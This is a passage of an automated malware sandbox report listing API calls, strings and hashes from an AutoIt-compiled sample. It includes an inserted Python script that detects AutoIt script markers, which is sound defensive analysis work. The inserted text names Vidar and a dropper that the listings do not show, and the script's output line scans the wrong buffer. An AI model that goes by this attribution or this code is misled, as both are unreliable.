                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F080A
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 002F0812
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 002F081A
                                                                            • Part of subcall function 002EFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002DAC6B), ref: 002EFFA7
                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002DAD08
                                                                          • OleInitialize.OLE32(00000000), ref: 002DAD85
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00312F56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                          • String ID: <w9$\t9$s9
                                                                          • API String ID: 1986988660-3008030475
                                                                          • Opcode ID: 3cc71ad6ce30d7179fa0499bc9646549eb17bf55aeb8cbe76e6ae0942e69b0c0
                                                                          • Instruction ID: ecacd9dbded62565c12602330fece0afe0e940ac1822faa98056077ce5f23152
                                                                          • Opcode Fuzzy Hash: 3cc71ad6ce30d7179fa0499bc9646549eb17bf55aeb8cbe76e6ae0942e69b0c0
                                                                          • Instruction Fuzzy Hash: 7A81BBB49382408EC787EF6AAD8566A7FEDEB49304B10816BD418C72F2EB7244158F95

                                                                          Control-flow Graph

                                                                          • Control-flow graph (rendered image; legend: Executed / Not Executed). Single block 1228 2e50db-2e514b, calling CreateWindowExW twice and ShowWindow twice.
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E5109
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E512A
                                                                          • ShowWindow.USER32(00000000), ref: 002E513E
                                                                          • ShowWindow.USER32(00000000), ref: 002E5147
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: 8b4516776dd18858b9da5bc372241d9e9c5ee4bb5e42bc175a304248b3dde400
                                                                          • Instruction ID: 85027ab70e43658b0beeeebf34787f5668f3b05cb3b64758bc450d237d3ffb28
                                                                          • Opcode Fuzzy Hash: 8b4516776dd18858b9da5bc372241d9e9c5ee4bb5e42bc175a304248b3dde400
                                                                          • Instruction Fuzzy Hash: 05F03A705642907EFA361727AC09E672E7DD7C6F50F00441AB900A21F0C6A21840CAB4

                                                                          Control-flow Graph

                                                                          • Control-flow graph (rendered image; legend: Executed / Not Executed). Entry block 339b16-339b9b; graph nodes 1327-1368 contain only calls to internal subroutines (2e4a8c, 339cf1, 2e4ab2, 2f593c, 3396c4, 338f0e, 2f2f85, 3390c1), no direct Win32 API calls.
                                                                          APIs
                                                                            • Part of subcall function 002E4A8C: _fseek.LIBCMT ref: 002E4AA4
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DE1
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DF4
                                                                          • _free.LIBCMT ref: 00339C5F
                                                                          • _free.LIBCMT ref: 00339C66
                                                                          • _free.LIBCMT ref: 00339CD1
                                                                            • Part of subcall function 002F2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2F99
                                                                            • Part of subcall function 002F2F85: GetLastError.KERNEL32(00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2FAB
                                                                          • _free.LIBCMT ref: 00339CD9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                          • API String ID: 1552873950-2806939583
                                                                          • Opcode ID: fb742bb9de7d23a18b63cfd67b32db93db3e7707bb5983585faa17de6e3a4376
                                                                          • Instruction ID: 6ea138d072f5ca3276387c3b1a2a51ea3a14670b80d25cca916d8a7f3cadef29
                                                                          • Opcode Fuzzy Hash: fb742bb9de7d23a18b63cfd67b32db93db3e7707bb5983585faa17de6e3a4376
                                                                          • Instruction Fuzzy Hash: B45159B1D14259AFDF249F64DC81AAEBBB9FF48314F1001AEB209A3341DB715A948F58
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1559183368-0
                                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                          • Instruction ID: a01d281905b3f9d643920318fdb5255309671576b5bc9ea76a6be08a0d60e6fb
                                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                          • Instruction Fuzzy Hash: A9519530A20B1EDBDB249E69988467EF7A5AF403A0F248739FB35D62D0D7709D608F40
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D52E6
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D534A
                                                                          • TranslateMessage.USER32(?), ref: 002D5356
                                                                          • DispatchMessageW.USER32(?), ref: 002D5360
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                          • String ID:
                                                                          • API String ID: 1795658109-0
                                                                          • Opcode ID: af230e6d768c2bcc11cf1fc90a55140029efde4e2a6cb00008c6542e25cd2622
                                                                          • Instruction ID: b2b6388ae42e91dadce6953cf403f220cf0fa8f5ee33e1b5823dcbb279ec6528
                                                                          • Opcode Fuzzy Hash: af230e6d768c2bcc11cf1fc90a55140029efde4e2a6cb00008c6542e25cd2622
                                                                          • Instruction Fuzzy Hash: 8C31E530938B069BEB728FA8DC48BBA77E89B01340F24409BE452862E0D7F29C55D711
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002D1275,SwapMouseButtons,00000004,?), ref: 002D12A8
                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002D1275,SwapMouseButtons,00000004,?), ref: 002D12C9
                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002D1275,SwapMouseButtons,00000004,?), ref: 002D12EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 3677997916-824357125
                                                                          • Opcode ID: 5e25831460c72a444575ef41adbee2faba1da611f910152b39249ebaeb6ebf84
                                                                          • Instruction ID: 6bc687b160e2f40186c3c67853255cfac818ab055c2d6b1a00625d9d38baf550
                                                                          • Opcode Fuzzy Hash: 5e25831460c72a444575ef41adbee2faba1da611f910152b39249ebaeb6ebf84
                                                                          • Instruction Fuzzy Hash: 2E115E71920218BFDB258FA5DC45EAF7BBCEF04740F10855AF805D7610D3719E6097A0
                                                                          APIs
                                                                            • Part of subcall function 002F593C: __FF_MSGBANNER.LIBCMT ref: 002F5953
                                                                            • Part of subcall function 002F593C: __NMSG_WRITE.LIBCMT ref: 002F595A
                                                                            • Part of subcall function 002F593C: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,00000004,?,?,002F1003,?), ref: 002F597F
                                                                          • std::exception::exception.LIBCMT ref: 002F101C
                                                                          • __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                            • Part of subcall function 002F87CB: RaiseException.KERNEL32(?,?,?,0038CAF8,?,?,?,?,?,002F1036,?,0038CAF8,?,00000001), ref: 002F8820
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                          • String ID: `=6$h=6
                                                                          • API String ID: 3902256705-1285141784
                                                                          • Opcode ID: 48b086cf168cb89c0360b7e551b79aaea6e05786c0171b2d4e0d5e0db83910ce
                                                                          • Instruction ID: 0910fd69adbd0e2b8b35e03d5a2905fe887c28f43e4656704e7e1da944d8600a
                                                                          • Opcode Fuzzy Hash: 48b086cf168cb89c0360b7e551b79aaea6e05786c0171b2d4e0d5e0db83910ce
                                                                          • Instruction Fuzzy Hash: FEF0D63956421EA2CB21BA58D8019FEF79C9F02390F504079FF0492681DFB08A708AA0
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E5B58
                                                                            • Part of subcall function 002E56F8: _memset.LIBCMT ref: 002E5787
                                                                            • Part of subcall function 002E56F8: _wcscpy.LIBCMT ref: 002E57DB
                                                                            • Part of subcall function 002E56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002E57EB
                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 002E5BAD
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002E5BBC
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00320D7C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1378193009-0
                                                                          • Opcode ID: bf37f00e0ddf06eac00f27cfc8dd053e79a9495c46b7df48676bd43916d1e872
                                                                          • Instruction ID: 1c01589627e22e8c57878ec66e98bc84ff4ca62021610280bb52f538a296f52f
                                                                          • Opcode Fuzzy Hash: bf37f00e0ddf06eac00f27cfc8dd053e79a9495c46b7df48676bd43916d1e872
                                                                          • Instruction Fuzzy Hash: 752149705557E49FEB738B34D885BEBBBECAF0130CF00048DE68A56182C3702989CB51
                                                                          APIs
                                                                            • Part of subcall function 002E49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002E27AF,?,00000001), ref: 002E49F4
                                                                          • _free.LIBCMT ref: 0031FB04
                                                                          • _free.LIBCMT ref: 0031FB4B
                                                                            • Part of subcall function 002E29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002E2ADF
                                                                          Strings
                                                                          • Bad directive syntax error, xrefs: 0031FB33
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                          • String ID: Bad directive syntax error
                                                                          • API String ID: 2861923089-2118420937
                                                                          • Opcode ID: d40f80364820ac33f8bb2ea322834d7d01354d0ed28329ff56b0afc2104a1d9b
                                                                          • Instruction ID: 40467d00a76250cf222b34231fc10a7c7fa4239afdca673f5a17b006cde6c5f9
                                                                          • Opcode Fuzzy Hash: d40f80364820ac33f8bb2ea322834d7d01354d0ed28329ff56b0afc2104a1d9b
                                                                          • Instruction Fuzzy Hash: 88918D71910259EFCF09EFA5C8919EEB7B8BF09310F50453AF816AB2A1DB309954CF50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: AU3! ?6$EA06
                                                                          • API String ID: 4104443479-1139135814
                                                                          • Opcode ID: e176d47bf98dbe6d698d422cf06a1739bdf577a56d97df6dfecd1d9f6a5cc2e4
                                                                          • Instruction ID: ddc7bfb9dc84c316e4ebe54051213d5433774131c866c1dd5029873e07e6c85a
                                                                          • Opcode Fuzzy Hash: e176d47bf98dbe6d698d422cf06a1739bdf577a56d97df6dfecd1d9f6a5cc2e4
                                                                          • Instruction Fuzzy Hash: AA41AF31A641E85BDF22AB6588517BF7FA18B45310FE540B5E881FB283C6708D6487E1
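The function listings above reference the marker strings `>>>AUTOIT SCRIPT<<<` and the `AU3!` / `EA06` fragments, which identify this process image as an AutoIt-compiled wrapper around the Vidar payload. The following triage check is an added example and is not part of the Joe Sandbox report or of any unpacker tool: it scans a raw PE file or memory dump for those two markers (the contiguous form `AU3!EA06` is the standard AutoIt v3 compiled-script subtype tag) and reports where the embedded script blob starts. The 16-byte magic that precedes `AU3!EA06` in a compiled-script resource is an assumption taken from public AutoIt unpacker sources, so the code treats it only as corroboration, never as a requirement. The sample blob at the bottom is constructed for offline use.

```python
"""
Triage check for AutoIt-compiled PE images.

Added example, not part of the Joe Sandbox report. It searches for the
marker strings referenced by the sample's own code ('>>>AUTOIT SCRIPT<<<'
and 'AU3!EA06') so an analyst can confirm the AutoIt wrapper before
carving the embedded script. The 16-byte resource magic is an assumption
taken from public AutoIt unpacker tooling.
"""
from dataclasses import dataclass, field
from typing import List, Optional

# Markers referenced by the sample's code (see the function listings above).
SCRIPT_RESOURCE_MARKER = b">>>AUTOIT SCRIPT<<<"
AU3_SUBTYPE_MARKER = b"AU3!EA06"

# Assumed (from public unpackers, not from the report): 16-byte magic that
# precedes "AU3!EA06" at the start of a compiled-script blob.
AU3_RESOURCE_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


@dataclass
class AutoItScanResult:
    script_marker_offsets: List[int] = field(default_factory=list)
    au3_marker_offsets: List[int] = field(default_factory=list)
    magic_offsets: List[int] = field(default_factory=list)

    @property
    def is_autoit(self) -> bool:
        # Either documented marker alone is a strong indicator; the assumed
        # magic only corroborates and is not required for a positive verdict.
        return bool(self.script_marker_offsets or self.au3_marker_offsets)


def _find_all(haystack: bytes, needle: bytes) -> List[int]:
    """Every non-overlapping offset at which needle occurs in haystack."""
    offsets: List[int] = []
    start = 0
    while True:
        idx = haystack.find(needle, start)
        if idx == -1:
            return offsets
        offsets.append(idx)
        start = idx + len(needle)


def scan_autoit_markers(data: bytes) -> AutoItScanResult:
    """Scan a raw PE image or memory dump for AutoIt compiled-script markers."""
    return AutoItScanResult(
        script_marker_offsets=_find_all(data, SCRIPT_RESOURCE_MARKER),
        au3_marker_offsets=_find_all(data, AU3_SUBTYPE_MARKER),
        magic_offsets=_find_all(data, AU3_RESOURCE_MAGIC),
    )


def script_blob_offset(data: bytes) -> Optional[int]:
    """Start of the compiled-script blob, or None if no AU3 marker is present.

    Prefer a magic immediately followed by 'AU3!EA06'; if the assumed magic
    is absent, fall back to the first bare 'AU3!EA06' hit.
    """
    tag_len = len(AU3_SUBTYPE_MARKER)
    for off in _find_all(data, AU3_RESOURCE_MAGIC):
        tag_start = off + len(AU3_RESOURCE_MAGIC)
        if data[tag_start:tag_start + tag_len] == AU3_SUBTYPE_MARKER:
            return off
    hits = _find_all(data, AU3_SUBTYPE_MARKER)
    return hits[0] if hits else None


def scan_file(path: str) -> AutoItScanResult:
    """Convenience wrapper: read a file from disk and scan it."""
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


# Constructed sample (not a real binary): a PE-like blob carrying both markers.
CONSTRUCTED_SAMPLE = (
    b"MZ" + b"\x00" * 62                       # fake DOS header, 64 bytes
    + b"PE\x00\x00" + b"\x90" * 100             # fake PE header + filler
    + SCRIPT_RESOURCE_MARKER + b"\x00" * 8      # script resource marker @168
    + AU3_RESOURCE_MAGIC + AU3_SUBTYPE_MARKER   # magic @195, AU3!EA06 @211
    + b"\xAB" * 32
    + SCRIPT_RESOURCE_MARKER                    # trailing marker @251
)

if __name__ == "__main__":
    import sys
    res = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_autoit_markers(CONSTRUCTED_SAMPLE)
    print(f"autoit={res.is_autoit} script_marker={res.script_marker_offsets} "
          f"au3={res.au3_marker_offsets} magic={res.magic_offsets} "
          f"blob_offset={script_blob_offset(CONSTRUCTED_SAMPLE)}")
```

Run it against the dumped image for process 11 (the `002D0000` region the listings come from) rather than only the on-disk `lem.exe`: the markers live in the AutoIt runtime's resource data, so a packed or overlay-stripped dropper may only expose them in memory.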
                                                                          APIs
                                                                            • Part of subcall function 002E4AB2: __fread_nolock.LIBCMT ref: 002E4AD0
                                                                          • _wcscmp.LIBCMT ref: 00339DE1
                                                                          • _wcscmp.LIBCMT ref: 00339DF4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp$__fread_nolock
                                                                          • String ID: FILE
                                                                          • API String ID: 4029003684-3121273764
                                                                          • Opcode ID: 16865aaee01ae360542d086b07bec4661277731a959db96fbbf1d7e4a902b2e2
                                                                          • Instruction ID: 3c10c20bbc70bae772627394e9c7cc63de3df90cf97cc23b63bf91b44f590caa
                                                                          • Opcode Fuzzy Hash: 16865aaee01ae360542d086b07bec4661277731a959db96fbbf1d7e4a902b2e2
                                                                          • Instruction Fuzzy Hash: 5341F971A40209BADF21EAA5CC96FEFB7BDDF45710F01447AFA00A7280D6B199548B64
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0032032B
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00320375
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                            • Part of subcall function 002F09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002F09E4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                          • String ID: X
                                                                          • API String ID: 3777226403-3081909835
                                                                          • Opcode ID: adf264f8c1a5085f3b239f723f27385c1f77233bf98f5bdb94954982d101278b
                                                                          • Instruction ID: eef9d568d1fd83d09fadc0d5202fb665da291f5994a676cae31d6e3420d5ad80
                                                                          • Opcode Fuzzy Hash: adf264f8c1a5085f3b239f723f27385c1f77233bf98f5bdb94954982d101278b
                                                                          • Instruction Fuzzy Hash: 0321C371A202989BDF06DF94D845BEEBBFC9F49300F00405AE508A7241DBF55A9CCFA1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 46246608daa0d42b4d8a7dea422632efdcfa2667946ed935db22b87287fc4340
                                                                          • Instruction ID: 2873ed66a5351242ab0b593d0699a33a482e8af72108e9d92648ed658f7fa144
                                                                          • Opcode Fuzzy Hash: 46246608daa0d42b4d8a7dea422632efdcfa2667946ed935db22b87287fc4340
                                                                          • Instruction Fuzzy Hash: EFF147B0A083009FC715DF28C484A6ABBE5FF89314F55892EF8999B351DB70E945CF82
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: ef247a5bfc9404fe3f06181743d4d8609ae2d7e41b9b4e649c6bbb8b04cecc7f
                                                                          • Instruction ID: e9946f5a02e364c4c54d948125254f46664baa59c2aa17a956b536649f5890fa
                                                                          • Opcode Fuzzy Hash: ef247a5bfc9404fe3f06181743d4d8609ae2d7e41b9b4e649c6bbb8b04cecc7f
